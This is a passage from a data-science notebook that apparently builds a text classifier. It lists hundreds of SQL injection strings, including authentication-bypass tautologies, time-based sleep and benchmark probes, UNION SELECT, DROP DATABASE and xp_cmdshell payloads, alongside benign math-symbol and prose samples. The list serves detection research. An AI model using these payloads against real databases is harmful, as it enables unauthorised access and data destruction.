 ' or 1 = 1 or "" = ',
 ' or a = a--',
 ' or a = a',
 " )  or  ( 'a' = 'a",
 ' )  or  ( a = a',
 'hi or a = a',
 'hi or 1 = 1 --"',
 "hi' or 1 = 1 --",
 "hi' or 'a' = 'a",
 "hi' )  or  ( 'a' = 'a",
 '"hi"" )  or  ( ""a"" = ""a"',
 "hi' or 'x' = 'x';",
 'or',
 " or username like '%",
 " or uname like '%",
 " or userid like '%",
 " or uid like '%",
 " or user like '%",
 ' or  ( EXISTS ) ',
 ' or 1 = 1',
 '%27 or 1 = 1',
 '&apos; OR',
 " or 1 = 1 or '' = '",
 " or '' = '",
 "x' or 1 = 1 or 'x' = 'y",
 "a' or 3 = 3--",
 '"a"" or 3 = 3--"',
 ' or 3 = 3',
 '‘ or 3 = 3 --',
 " )  or  ( 'x' = 'x",
 ' or 1 = 1',
 '"hi"" )  or  ( ""a"" = ""a"',
 ' or 0 = 0 #',
 '1 )  or sleep ( __TIME__ ) #',
 " )  or  ( 'a' = 'a",
 '1  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #',
 '"a"" or 3 = 3--"',
 '" or benchmark ( 10000000,MD5 ( 1  )  )  #',
 ' or 0 = 0 --',
 " or 'a' = 'a",
 'hi or 1 = 1 --"',
 'or a  =  a',
 " )  or sleep ( __TIME__ )  = '",
 '  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #',
 "hi' or 'a' = 'a",
 ' or 1 = 1',
 ' or 2 > 1',
 '"  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #',
 "hi' )  or  ( 'a' = 'a",
 ' or 3 = 3',
 " or 1 = 1 or '' = '",
 "a' or 1 = 1--",
 "a' or 'a'  =  'a",
 ' or 2 between 1 and 3',
 ' or a = a--',
 " or '1' = '1",
 " or 1 --'",
 'or 0 = 0 #"',
 '" or isNULL ( 1/0 )  /*',
 'â\x80\x98 or 1 = 1 --',
 ' or username like char ( 37 ) ;',
 " or '' = '",
 ' or x = x',
 "hi' or 1 = 1 --",
 " or 'x' = 'x",
 'Ã½ or 1 = 1 --',
 '0 or 1 = 1',
 ' )  or  ( a = a',
 '%27 or 1 = 1',
 '&apos; OR',
 "; or '1' = '1'",
 '1 or 1 = 1',
 "anything' OR 'x' = 'x",
 'or 0 = 0 --',
 'or 0 = 0 #',
 'hi or a = a',
 ' or 1 = 1 /*',
 'or 1 = 1 or "" = ',
 ' or 1 in  ( select @@version ) --',
 "x' or 1 = 1 or 'x' = 'y",
 'â\x80\x98 or 3 = 3 --',
 " or '1' = '1'--",
 '"a"" or 1 = 1--"',
 '" or 0 = 0 --',
 ' or 1/*',
 ' or a  =  a',
 ' or 1 = 1',
 '_x0018_ or 1 = 1 --',
 "x' OR full_name LIKE '%Bob%",
 " or '' = '",
 " or 'x' = 'x",
 " )  or  ( 'x' = 'x",
 ' or 0 = 0 --',
 ' or 0 = 0 #',
 ' or 0 = 0 #"',
 ' or 1 = 1--',
 " or '1' = '1'--",
 " or 1 --'",
 'or 1 = 1--',
 " or 1 = 1 or '' = '",
 ' or 1 = 1 or "" = ',
 ' or a = a--',
 ' or a = a',
 " )  or  ( 'a' = 'a",
 "hi' or 'x' = 'x';",
 " or username like '%",
 " or uname like '%",
 " or userid like '%",
 " or uid like '%",
 " or user like '%",
 ' or  ( EXISTS ) ',
 ' AND 1=1 ;',
 "' AND 1=1 -- --",
 ' AND 1=1 -- #',
 "' AND 1=1 -- %",
 "' AND 1=1 -- '",
 "' AND 1=1 #",
 "' AND 1=2 ;",
 "' AND 1=2 -- --",
 "' AND 1=2 -- #",
 "' AND 1=2 -- %",
 "' AND 1=2 -- '",
 "' AND 1=2 #",
 "' AND 2=1 ;",
 "' AND 2=1 -- --",
 "' AND 2=1 -- #",
 "' AND 2=1 -- %",
 "' AND 2=1 -- '",
 "' AND 2=1 #",
 "' AND 2=2 ;",
 "' AND 2=2 -- --",
 "' AND 2=2 -- #",
 "' AND 2=2 -- %",
 "' AND 2=2 -- '",
 "' AND 2=2 #",
 "' AND a=a ;",
 "' AND a=a -- --",
 "' AND a=a -- #",
 'AND a=a -- %',
 "' AND a=a -- '",
 "' AND a=a #",
 "') AND 1=1 ;",
 "') AND 1=1 -- --",
 "') AND 1=1 -- #",
 "') AND 1=1 -- %",
 "') AND 1=1 -- '",
 "') AND 1=1 #",
 "') AND 1=2 ;",
 "') AND 1=2 -- --",
 "') AND 1=2 -- #",
 "') AND 1=2 -- %",
 "') AND 1=2 -- '",
 "') AND 1=2 #",
 "') AND 2=1 ;",
 "') AND 2=1 -- --",
 "') AND 2=1 -- #",
 "') AND 2=1 -- %",
 "') AND 2=1 -- '",
 "') AND 2=1 #",
 "') AND 2=2 ;",
 "') AND 2=2 -- --",
 "') AND 2=2 -- #",
 "') AND 2=2 -- %",
 "') AND 2=2 -- '",
 "') AND 2=2 #",
 "') AND a=a ;",
 "') AND a=a -- --",
 "') AND a=a -- #",
 "') AND a=a -- %",
 "') AND a=a -- '",
 "') AND a=a #",
 "'] AND 1=1 ;",
 "'] AND 1=1 -- --",
 "'] AND 1=1 -- #",
 "'] AND 1=1 -- %",
 "'] AND 1=1 -- '",
 "'] AND 1=1 #",
 "'] AND 1=2 ;",
 "'] AND 1=2 -- --",
 "'] AND 1=2 -- #",
 "'] AND 1=2 -- %",
 "'] AND 1=2 -- '",
 "'] AND 1=2 #",
 "'] AND 2=1 ;",
 "'] AND 2=1 -- --",
 "'] AND 2=1 -- #",
 "'] AND 2=1 -- %",
 "'] AND 2=1 -- '",
 "'] AND 2=1 #",
 "'] AND 2=2 ;",
 "'] AND 2=2 -- --",
 "'] AND 2=2 -- #",
 "'] AND 2=2 -- %",
 "'] AND 2=2 -- '",
 "'] AND 2=2 #",
 "'] AND a=a ;",
 "'] AND a=a -- --",
 "'] AND a=a -- #",
 "'] AND a=a -- %",
 "] AND a=a -- '",
 "'] AND a=a #",
 "' AND 1=1 ;",
 " ''AND 1=1 -- --",
 " ''AND 1=1 -- #",
 " ''AND 1=1 -- %",
 "' AND 1=1 -- '",
 " ''AND 1=1 #",
 "' AND 1=2 ;",
 " ''AND 1=2 -- --",
 " ''AND 1=2 -- #",
 "' AND 1=2 -- %",
 '" AND 1=2 -- \'',
 '" AND 1=2 #',
 '" AND 2=1 ;',
 '" AND 2=1 -- --',
 '" AND 2=1 -- #',
 '" AND 2=1 -- %',
 '" AND 2=1 -- \'',
 '" AND 2=1 #',
 '" AND 2=2 ;',
 '" AND 2=2 -- --',
 '" AND 2=2 -- #',
 '" AND 2=2 -- %',
 '" AND 2=2 -- \'',
 '" AND 2=2 #',
 '" AND a=a ;',
 '" AND a=a -- --',
 '" AND a=a -- #',
 '" AND a=a -- %',
 '" AND a=a -- \'',
 '" AND a=a #',
 ' and 1 = 0 )  union all',
 "x' and userid is NULL; --",
 "x' and email is NULL; --",
 "x' and 1 =  ( select count ( * )  from tabname ) ; --",
 "x' and members.email is NULL; --",
 "1 and user_name (  )   =  'dbo'",
 '1 and 1 = 1',
 "1' and 1 =  ( select count ( * )  from tablenames ) ; --",
 "1 and user_name (  )   =  'dbo'",
 "1' and non_existant_table  =  '1",
 "1 and ascii ( lower ( substring  (  (  select top 1 name from sysobjects where xtype = 'u' ) , 1, 1  )  )   )  > 116",
 ' and 1 =  (  if  (  (  load_file ( char ( 110,46,101,120,116  )  )  <>char ( 39,39  )  )  ,1,0  )  )  ;',
 ' select * from users where id = 1 + ( \\ )  or 1 = 1 -- 1',
 "1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
 '1234 " AND 1 = 0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055',
 "x' AND userid IS NULL; --",
 "x' AND email IS NULL; --",
 "x' AND 1 =  ( SELECT COUNT ( * )  FROM tabname ) ; --",
 "x' AND members.email IS NULL; --",
 "x' AND email IS NULL; --",
 "x' AND members.email IS NULL; --",
 ' and 1 =  (  if  (  (  load_file ( char ( 110,46,101,120,11 …',
 "x' AND userid IS NULL; --",
 "x' AND 1 =  ( SELECT COUNT ( * )  FROM tabname ) ; --",
 ' ; DROP DATABASE user',
 " ' ; DROP DATABASE users",
 ' ; DROP DATABASE registration',
 ' ; DROP DATABASE ;',
 ' ; DROP DATABASE #',
 ' ; DROP DATABASE -- --',
 ' ; DROP DATABASE --#',
 '; DROP DATABASE --%',
 "; DROP DATABASE --'",
 '; exec master user',
 ' ; exec master users',
 ' ; exec master registration',
 ' ; exec master ;',
 ' ; exec master #',
 ' ; exec master -- --',
 ' ; exec master -- #',
 ' ; exec master -- %',
 " ; exec master -- '",
 "' ; exec xp user",
 ' ; exec xp users',
 "' ; exec xp registration",
 "' ; exec xp ;",
 "' ; exec xp #",
 "' ; exec xp -- --",
 "' ; exec xp -- #",
 "' ; exec xp -- %",
 "' ; exec xp -- '",
 "' ; exec sp user",
 "' ; exec sp users",
 "' ; exec sp registration",
 "' ; exec sp ;",
 "' ; exec sp #",
 "' ; exec sp -- --",
 "' ; exec sp -- #",
 "' ; exec sp -- %",
 "' ; exec sp -- '",
 "' ; delete user",
 "' ; delete users",
 "' ; delete registration",
 "' ; delete ;",
 "' ; delete #",
 "' ; delete -- --",
 "' ; delete -- #",
 "' ; delete -- %",
 "' ; delete -- '",
 ' ; DROP TABLE user user',
 ' ; DROP TABLE user users',
 ' ; DROP TABLE user registration',
 "' ; DROP TABLE user ;",
 ' ; DROP TABLE user #',
 ' ; DROP TABLE user -- --',
 ' ; DROP TABLE user -- #',
 '; DROP TABLE user --%',
 "; DROP TABLE user -- '",
 '; DROP TABLE users user',
 '; DROP TABLE users users',
 '; DROP TABLE users registration',
 "' ; DROP TABLE users ;",
 "' ; DROP TABLE users #",
 ' ; DROP TABLE users -- --',
 '; DROP TABLE users -- #',
 '; DROP TABLE users --%',
 "; DROP TABLE users --'",
 '; DROP TABLE registration user',
 '; DROP TABLE registration users',
 "registration registration' ; DROP TABLE registration ;",
 ' ; DROP TABLE registration #',
 ' ; DROP TABLE registration -- --',
 ' ; DROP TABLE registration -- #',
 ' ; DROP TABLE registration -- %',
 " ; DROP TABLE registration -- '",
 "; exec master..xp_cmdshell 'ping 172.10.1.255'--",
 '1 exec sp_  ( or exec xp_ ) ',
 "; execute immediate 'sel' || 'ect us' || 'er'",
 "; exec  ( 'sel' + 'ect us' + 'er' ) ",
 ' and 1 in  ( select var from temp ) --',
 "; exec master..xp_cmdshell 'ping 10.10.1.2'--",
 ' ; drop table temp --',
 ' and 1 in  ( select var from temp ) --',
 'exec xp',
 'exec ( @s ) ',
 'exec sp',
 "; exec  ( 'sel' + 'ect us' + 'er' ) ",
 '; exec master..xp_cmdshell',
 '; exec xp_regread',
 'exec ( @s ) ',
 "; execute immediate 'sel' || 'ect us' || 'er'",
 ' and 1 in  ( select var from temp ) --',
 '/**/or/**/1/**/ = /**/1']

In [9]:
# vec = CountVectorizer()
arr2=vec.fit_transform(df_HG)

In [10]:
table_HG=pd.DataFrame(arr2.toarray(), columns=vec.get_feature_names())
table_HG

,10,10000000,101,11,110,116,120,1234,172,23,...,users,var,version,where,xp,xp_,xp_cmdshell,xp_regread,xtype,ã½
0,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
1,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
2,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
3,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
4,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
559,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,1,0,0
560,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
561,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
562,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,0,0,0,0,0,0
563,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0

In [11]:
df_UK = [row['Query'] for index,row in df.iterrows() if row['Label'] == 'UK']
df_UK

['$',
 'www',
 'com',
 'get',
 '.',
 ')',
 '(',
 '~',
 'hi',
 'hello',
 'do',
 'can',
 'could',
 'have',
 'it',
 '≠',
 '`',
 '∈',
 '∉',
 '∅',
 '√',
 '≪',
 '∞',
 '∩',
 'π',
 'Kg',
 'g',
 'cm',
 'm',
 '÷',
 '°\u200eF',
 '°\u200eC',
 'log',
 'km/h',
 'loge x',
 'ln x',
 'x',
 '(a,b)',
 'sin',
 '90°',
 '105°',
 '75°',
 '120°',
 '60°',
 '135°',
 '0°',
 '180°',
 '16\xa02⁄3g',
 '2π',
 'x',
 'Cos',
 'xy',
 '→',
 '∫',
 '±',
 '∷',
 '∞',
 '∮',
 '∎',
 'sinh\xa02\xa0θ\xa0',
 ' (sinh θ)\xa0',
 'cos\xa0t\xa0',
 'sin\xa0t',
 'cosh(θ) ',
 'sinh(θ))  ',
 '(tanh(θ)',
 '☥',
 'a^b',
 '√a',
 '4√a',
 'n√a',
 '∠',
 '',
 '',
 '',
 '≅',
 '|x-y|',
 '≪',
 '( )',
 'x!',
 '(f\xa0∘\xa0g)',
 '∑',
 '∑∑',
 'e',
 'A⊗B',
 '|\xa0A\xa0|',
 'A†',
 'A\xa0-1',
 'rank(A)',
 'f\xa0(x)',
 'E(X | Y)',
 'var(X)',
 'σ2',
 'U(a,b)',
 'nPk',
 'nCk',
 '⇒',
 '∀',
 '∃',
 '∄',
 '∴',
 '∵',
 'ε',
 '∫∫',
 '∫∫∫',
 '∮',
 '∯',
 '∰',
 '',
 '',
 'δ',
 '∇',
 'δ',
 'I',
 'II',
 'IV',
 'V',
 'VI',
 'VII',
 'XI',
 'XXX',
 '',
 '',
 '',
 '',
 '',
 '⇔',
 'Ac',
 'α',
 'β',
 'Ω',
 'ℂ',
 'ℵ',
 '∏',
 'z*',
 '2A',
 's\xa02',
 'Q1',
 'σX',
 'N(μ,σ2)',
 '∟',
 '∢',
 '∡',
 '∤',
 '∦',
 '∱',
 '∲',
 '∸',
 '∹',
 '∺',
 '∻',
 '≁',
 '≂',
 '≃',
 '≄',
 '≋',
 '≒',
 '≖',
 '≛',
 '≩',
 '≨',
 '≮/',
 '≯',
 '≺',
 '⊀',
 '⊁',
 '⊒',
 '⊑',
 '⊖',
 '⊘',
 '⊛',
 '⊚',
 '⊞',
 '⊟',
 '⊡',
 '⊢',
 '⊣',
 '⊥',
 '⊭',
 '⊲',
 '⊳',
 '⊶',
 '⊷',
 '⊸',
 '⊹',
 '⊾',
 '⋇',
 '⋈',
 '⋉',
 '⋊',
 '⋐',
 '⋔',
 '⋪',
 'ₔ',
 '≝',
 '≞',
 '⊎',
 '⋍',
 '⋿',
 '╾',
 '▇',
 '◙',
 '↜',
 '↦',
 '⇍',
 '⇞',
 '⇦',
 '⇶',
 '‱']

In [12]:
vec3 = CountVectorizer()
arr3 = vec3.fit_transform(df_UK)
# vec3 = CountVectorizer()
# arr3=vec3.fit_transform()
table_UK=pd.DataFrame(arr3.toarray(), columns=vec3.get_feature_names())
table_UK
# print(arr3.toarray())
# print(vec3.get_feature_names())

,105,120,135,16,180,2a,2π,3g,60,75,...,tanh,var,vi,vii,www,xi,xxx,xy,σ2,σx
0,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
1,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,1,0,0,0,0,0
2,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
3,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
4,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
204,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
205,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
206,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
207,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
208,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0

In [13]:
df_NV = [row['Query'] for index,row in df.iterrows() if row['Label'] == 'NV']
df_NV

[' Man star; soul Render honest perfect man, Commands light, influence, fate; Nothing falls early late',
 ' Our acts angels are, good ill, Our fatal shadows walk us still',
 ' Epilogue Beaumont Fletcher’s Honest Man’s Fortune Cast bantling rocks, Suckle she-wolf’s teat; Wintered hawk fox, Power speed hands feet',
 ' I read day verses written eminent painter original conventional',
 ' The soul always hears admonition lines, let subject may',
 ' The sentiment instil value thought may contain',
 ' To believe thought, believe true private heart true men, — genius',
 ' Speak latent conviction, shall universal sense; inmost due time becomes outmost, — first thought rendered back us trumpets Last Judgment',
 ' Familiar voice mind each, highest merit ascribe Moses, Plato, Milton is, set naught books traditions, spoke men thought',
 ' A man learn detect watch gleam light flashes across mind within, lustre firmament bards sages',
 ' Yet dismisses without notice thought, his',
 ' In every work genius recognize rejected thoughts: come back us certain alienated majesty',
 ' Great works art affecting lesson us this',
 ' They teach us abide spontaneous impression good-humored inflexibility whole cry voices side',
 ' Else, to-morrow stranger say masterly good sense precisely thought felt time, shall forced take shame opinion another',
 ' There time every man’s education arrives conviction envy ignorance; imitation suicide; must take better, worse, portion; though wide universe full good, kernel nourishing corn come toil bestowed plot ground given till',
 ' The power resides new nature, none knows do, know tried',
 ' Not nothing one face, one character, one fact, makes much impression him, another none',
 ' This sculpture memory without preestablished harmony',
 ' The eye placed one ray fall, might testify particular ray',
 ' We half express ourselves, ashamed divine idea us represents',
 ' It may safely trusted proportionate good issues, faithfully imparted, God work made manifest cowards',
 ' A man relieved gay put heart work done best; said done otherwise, shall give peace',
 ' It deliverance deliver',
 ' In attempt genius deserts him; muse befriends; invention, hope',
 ' Trust thyself: every heart vibrates iron string',
 ' Accept place divine providence found you, society contemporaries, connection events',
 ' Great men always done so, confided childlike genius age, betraying perception absolutely trustworthy seated heart, working hands, predominating being',
 ' And men, must accept highest mind transcendent destiny; minors invalids protected corner, cowards fleeing revolution, guides, redeemers, benefactors, obeying Almighty effort, advancing Chaos Dark',
 ' What pretty oracles nature yields us text, face behaviour children, babes, even brutes! That divided rebel mind, distrust sentiment arithmetic computed strength means opposed purpose, not',
 ' Their mind whole, eye yet unconquered, look faces, disconcerted',
 ' Infancy conforms nobody: conform it, one babe commonly makes four five adults prattle play it',
 ' So God armed youth puberty manhood less piquancy charm, made enviable gracious claims put by, stand itself',
 ' Do think youth force, cannot speak me',
 ' Hark! next room voice sufficiently clear emphatic',
 ' It seems knows speak contemporaries',
 ' Bashful bold, then, know make us seniors unnecessary',
 ' The nonchalance boys sure dinner, would disdain much lord say aught conciliate one, healthy attitude human nature',
 ' A boy parlour pit playhouse; independent, irresponsible, looking corner people facts pass by, tries sentences merits, swift, summary way boys, good, bad, interesting, silly, eloquent, troublesome',
 ' He cumbers never consequences, interests: gives independent, genuine verdict',
 ' You must court him: court you',
 ' But man is, were, clapped jail consciousness',
 ' As soon acted spoken eclat, committed person, watched sympathy hatred hundreds, whose affections must enter account',
 ' There Lethe this',
 ' Ah, could pass neutrality! Who thus avoid pledges, observed, observe unaffected, unbiased, unbribable, unaffrighted innocence, must always formidable',
 ' He would utter opinions passing affairs, seen private, necessary, would sink like darts ear men, put fear',
 ' These voices hear solitude, grow faint inaudible enter world',
 ' Society everywhere conspiracy manhood every one members',
 ' Society joint-stock company, members agree, better securing bread shareholder, surrender liberty culture eater',
 ' The virtue request conformity',
 ' Self-reliance aversion',
 ' It loves realities creators, names customs',
 ' Whoso would man must nonconformist',
 ' He would gather immortal palms must hindered name goodness, must explore goodness',
 ' Nothing last sacred integrity mind',
 ' Absolve yourself, shall suffrage world',
 ' I remember answer quite young I prompted make valued adviser, wont importune dear old doctrines church',
 ' On saying, What I sacredness traditions, I live wholly within? friend suggested, — But impulses may below, above',
 ' I replied, They seem such; I Devil’s child, I live Devil',
 ' No law sacred nature',
 ' Good bad names readily transferable this; right constitution, wrong it',
 ' A man carry presence opposition, every thing titular ephemeral he',
 ' I ashamed think easily capitulate badges names, large societies dead institutions',
 ' Every decent well-spoken individual affects sways right',
 ' I ought go upright vital, speak rude truth ways',
 ' If malice vanity wear coat philanthropy, shall pass? If angry bigot assumes bountiful cause Abolition, comes last news Barbadoes, I say him, ‘Go love thy infant; love thy wood-chopper: good-natured modest: grace; never varnish hard, uncharitable ambition incredible tenderness black folk thousand miles off',
 ' Thy love afar spite home',
 '’ Rough graceless would greeting, truth handsomer affectation love',
 ' Your goodness must edge it, — else none',
 ' The doctrine hatred must preached counteraction doctrine love pules whines',
 ' I shun father mother wife brother, genius calls me',
 ' I would write lintels door-post, Whim',
 ' I hope somewhat better whim last, cannot spend day explanation',
 ' Expect show cause I seek I exclude company',
 ' Then, again, tell me, good man to-day, obligation put poor men good situations',
 ' Are poor? I tell thee, thou foolish philanthropist, I grudge dollar, dime, cent, I give men belong I belong',
 ' There class persons spiritual affinity I bought sold; I go prison, need be; miscellaneous popular charities; education college fools; building meeting-houses vain end many stand; alms sots; thousandfold Relief Societies; — though I confess shame I sometimes succumb give dollar, wicked dollar I shall manhood withhold',
 ' Virtues are, popular estimate, rather exception rule',
 ' There man virtues',
 ' Men called good action, piece courage charity, much would pay fine expiation daily non-appearance parade',
 ' Their works done apology extenuation living world, — invalids insane pay high board',
 ' Their virtues penances',
 ' I wish expiate, live',
 ' My life spectacle',
 ' I much prefer lower strain, genuine equal, glittering unsteady',
 ' I wish sound sweet, need diet bleeding',
 ' I ask primary evidence man, refuse appeal man actions',
 ' I know makes difference whether I forbear actions reckoned excellent',
 ' I cannot consent pay privilege I intrinsic right',
 ' Few mean gifts may be, I actually am, need assurance assurance fellows secondary testimony',
 ' What I must concerns me, people think',
 ' This rule, equally arduous actual intellectual life, may serve whole distinction greatness meanness',
 ' It harder, always find think know duty better know it',
 ' It easy world live world’s opinion; easy solitude live own; great man midst crowd keeps perfect sweetness independence solitude',
 ' The objection conforming usages become dead is, scatters force',
 ' It loses time blurs impression character',
 ' If maintain dead church, contribute dead Bible-society, vote great party either government it, spread table like base housekeepers, — screens I difficulty detect precise man are',
 ' And, course, much force withdrawn proper life',
 ' But work, I shall know you',
 ' Do work, shall reinforce yourself',
 ' A man must consider blindman’s-buff game conformity',
 ' If I know sect, I anticipate argument',
 ' I hear preacher announce text topic expediency one institutions church',
 ' Do I know beforehand possibly say new spontaneous word? Do I know that, ostentation examining grounds institution, thing? Do I know pledged look one side, — permitted side, man, parish minister? He retained attorney, airs bench emptiest affectation',
 ' Well, men bound eyes one another handkerchief, attached one communities opinion',
 ' This conformity makes false particulars, authors lies, false particulars',
 ' Their every truth quite true',
 ' Their two real two, four real four; every word say chagrins us, know begin set right',
 ' Meantime nature slow equip us prison-uniform party adhere',
 ' We come wear one cut face figure, acquire degrees gentlest asinine expression',
 ' There mortifying experience particular, fail wreak also general history; I mean foolish face praise, forced smile put company feel ease answer conversation interest us',
 ' The muscles, spontaneously moved, moved low usurping wilfulness, grow tight outline face disagreeable sensation',
 ' For nonconformity world whips displeasure',
 ' And therefore man must know estimate sour face',
 ' The by-standers look askance public street friend’s parlour',
 ' If aversation origin contempt resistance like own, might well go home sad countenance; sour faces multitude, like sweet faces, deep cause, put wind blows newspaper directs',
 ' Yet discontent multitude formidable senate college',
 ' It easy enough firm man knows world brook rage cultivated classes',
 ' Their rage decorous prudent, timid vulnerable themselves',
 ' But feminine rage indignation people added, ignorant poor aroused, unintelligent brute force lies bottom society made growl mow, needs habit magnanimity religion treat godlike trifle concernment',
 ' The terror scares us self-trust consistency; reverence past act word, eyes others data computing orbit past acts, loath disappoint them',
 ' But keep head shoulder? Why drag corpse memory, lest contradict somewhat stated public place? Suppose contradict yourself; then? It seems rule wisdom never rely memory alone, scarcely even acts pure memory, bring past judgment thousand-eyed present, live ever new day',
 ' In metaphysics denied personality Deity: yet devout motions soul come, yield heart life, though clothe God shape color',
 ' Leave theory, Joseph coat hand harlot, flee',
 ' A foolish consistency hobgoblin little minds, adored little statesmen philosophers divines',
 ' With consistency great soul simply nothing do',
 ' He may well concern shadow wall',
 ' Speak think hard words, to-morrow speak to-morrow thinks hard words again, though contradict every thing said to-day',
 ' — ‘Ah, shall sure misunderstood',
 '’ — Is bad, then, misunderstood? Pythagoras misunderstood, Socrates, Jesus, Luther, Copernicus, Galileo, Newton, every pure wise spirit ever took flesh',
 ' To great misunderstood',
 ' I suppose man violate nature',
 ' All sallies rounded law being, inequalities Andes Himmaleh insignificant curve sphere',
 ' Nor matter gauge try him',
 ' A character like acrostic Alexandrian stanza; — read forward, backward, across, still spells thing',
 ' In pleasing, contrite wood-life God allows me, let record day day honest thought without prospect retrospect, and, I cannot doubt, found symmetrical, though I mean not, see not',
 ' My book smell pines resound hum insects',
 ' The swallow window interweave thread straw carries bill web also',
 ' We pass are',
 ' Character teaches wills',
 ' Men imagine communicate virtue vice overt actions, see virtue vice emit breath every moment',
 ' There agreement whatever variety actions, honest natural hour',
 ' For one will, actions harmonious, however unlike seem',
 ' These varieties lost sight little distance, little height thought',
 ' One tendency unites all',
 ' The voyage best ship zigzag line hundred tacks',
 ' See line sufficient distance, straightens average tendency',
 ' Your genuine action explain itself, explain genuine actions',
 ' Your conformity explains nothing',
 ' Act singly, already done singly justify now',
 ' Greatness appeals future',
 ' If I firm enough to-day right, scorn eyes, I must done much right defend now',
 ' Be will, right now',
 ' Always scorn appearances, always may',
 ' The force character cumulative',
 ' All foregone days virtue work health this',
 ' What makes majesty heroes senate field, fills imagination? The consciousness train great days victories behind',
 ' They shed united light advancing actor',
 ' He attended visible escort angels',
 ' That throws thunder Chatham’s voice, dignity Washington’s port, America Adams’s eye',
 ' Honor venerable us ephemeris',
 ' It always ancient virtue',
 ' We worship to-day to-day',
 ' We love pay homage, trap love homage, selfdependent, self-derived, therefore old immaculate pedigree, even shown young person',
 ' I hope days heard last conformity consistency',
 ' Let words gazetted ridiculous henceforward',
 ' Instead gong dinner, let us hear whistle Spartan fife',
 ' Let us never bow apologize more',
 ' A great man coming eat house',
 ' I wish please him; I wish wish please me',
 ' I stand humanity, though I would make kind, I would make true',
 ' Let us affront reprimand smooth mediocrity squalid contentment times, hurl face custom, trade, office, fact upshot history, great responsible Thinker Actor working wherever man works; true man belongs time place, centre things',
 ' Where is, nature',
 ' He measures you, men, events',
 ' Ordinarily, every body society reminds us somewhat else, person',
 ' Character, reality, reminds nothing else; takes place whole creation',
 ' The man must much, must make circumstances indifferent',
 ' Every true man cause, country, age; requires infinite spaces numbers time fully accomplish design; — posterity seem follow steps train clients',
 ' A man Caesar born, ages Roman Empire',
 ' Christ born, millions minds grow cleave genius, confounded virtue possible man',
 ' An institution lengthened shadow one man; as, Monachism, Hermit Antony; Reformation, Luther; Quakerism, Fox; Methodism, Wesley; Abolition, Clarkson',
 ' Scipio, Milton called height Rome; history resolves easily biography stout earnest persons',
 ' Standard automatic speech recognizers output unstructured streams words',
 ' They neither perform proper segmentation output sentences, predict punctuation symbols',
 ' The unavailable punctuations sentence boundaries transcribed speech texts create barriers many subsequent processing tasks, summarization, information extraction, question answering machine translation',
 ' Thus, segmentation long texts necessary many real applications',
 ' For example, speech-to-speech translation, continuously transcribed speech texts need segmented fed subsequent machine translation systems (Takezawa et al',
 ', 1998; Nakamura, 2009)',
 ' This current machine translation (MT) systems perform translation sentence level, various models used MT trained segmented sentences many algorithms inside MT exponential complexity regard length inputs',
 ' The punctuation prediction problem attracted research interest speech processing community natural language processing community',
 ' Most previous work primarily exploits local features statistical models lexicons, prosodic cues hidden event language model (HELM) (Liu et al',
 ', 2005; Matusov et al',
 ', 2006; Huang Zweig, 2002; Stolcke Shriberg, 1996)',
 ' The word-level models integrating local features narrow views input could achieve satisfied performance due limited context information access (Favre et al',
 ', 2008)',
 ' Naturally, global contexts required model punctuation prediction, especially long-range dependencies',
 ' For instance, English question sentences, ending question mark long-range dependent initial phrases (Lu Ng, 2010), could Figure 1',
 ' There work trying incorporate syntactic features broaden view hypotheses punctuation prediction models (Roark et al',
 ', 2006; Favre et al',
 ', 2008)',
 ' In methods, punctuation prediction treated separated post-procedure parsing, may suffer problem error propagation',
 ' In addition, approaches able incrementally process inputs efficient long inputs, especially cases long transcribed speech texts presentations number streaming words could larger hundreds thousands',
 ' In paper, propose jointly performing punctuation prediction transition-based dependency parsing transcribed speech text',
 ' When transition-based parsing consumes stream words left right shift-reduce decoding algorithm, punctuation symbols predicted word based contexts parsing tree',
 ' Two models proposed cause punctuation prediction interact transition actions parsing',
 ' One conduct transition actions parsing followed punctuation predictions cascaded way',
 ' The associate conventional transition actions parsing punctuation perditions, predicted punctuations directly inferred parsing tree',
 ' Our models linear complexity capable handling streams words length',
 ' In addition, computation models use rich set syntactic features, improve complicated punctuation predictions global view, especially long range dependencies',
 ' Figure 1 shows example parsing helps punctuation prediction transcribed speech text',
 ' As illustrated Figure 1(b), two commas predicted preceding words act adverbial modifiers (advmod) parsing',
 ' The period word menu predicted parsing adverbial clause modifier (advcl) completed',
 ' The question mark end input determined direct object modifier (dobj) identified, together long range clue auxiliary word occurs nominal subject (nsubj)',
 ' Eventually, two segmentations formed according punctuation prediction results, shown Figure 1©',
 ' The training data used models adapted Treebank data excluding punctuations keeping punctuation contexts, simulate unavailable annotated transcribed speech texts',
 ' In decoding, beam search used get optimal punctuation prediction results',
 ' We conduct experiments IWSLT data TDT4 test data sets',
